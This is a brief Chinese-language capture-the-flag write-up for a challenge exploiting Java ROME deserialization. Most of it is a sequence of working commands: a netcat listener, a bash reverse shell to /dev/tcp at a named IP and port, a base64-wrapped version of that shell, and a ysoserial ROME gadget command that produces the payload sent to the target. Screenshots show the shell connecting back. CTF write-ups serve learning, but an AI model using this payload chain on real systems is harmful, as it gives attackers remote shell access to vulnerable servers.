# \[WEEK4]ROME

很容易找到ROME反序列化，构造时花了比较长的时间在纠结编码上

先VPS上开监听

```
nc -lvnp 7777
```

然后构造反弹shell命令

```
bash -i >& /dev/tcp/1.12.51.64/7777 0>&1
```

经过base64编码

```
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjUxLjY0Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
```

使用yso

```
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjUxLjY0Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64
```

删掉回车和url编码，发送

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FNMIq63QPaCa2YpQ08Itc%2Fimage.png?alt=media&#x26;token=8ad182e0-eac2-4edd-9793-cee4b2340d03" alt=""><figcaption></figcaption></figure>

VPS收到监听

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FVlgVEccvUGCsEM2G3a87%2Fimage.png?alt=media&#x26;token=fd8e9c08-3e1d-4aea-8ed2-8c6c7c3272ba" alt=""><figcaption></figcaption></figure>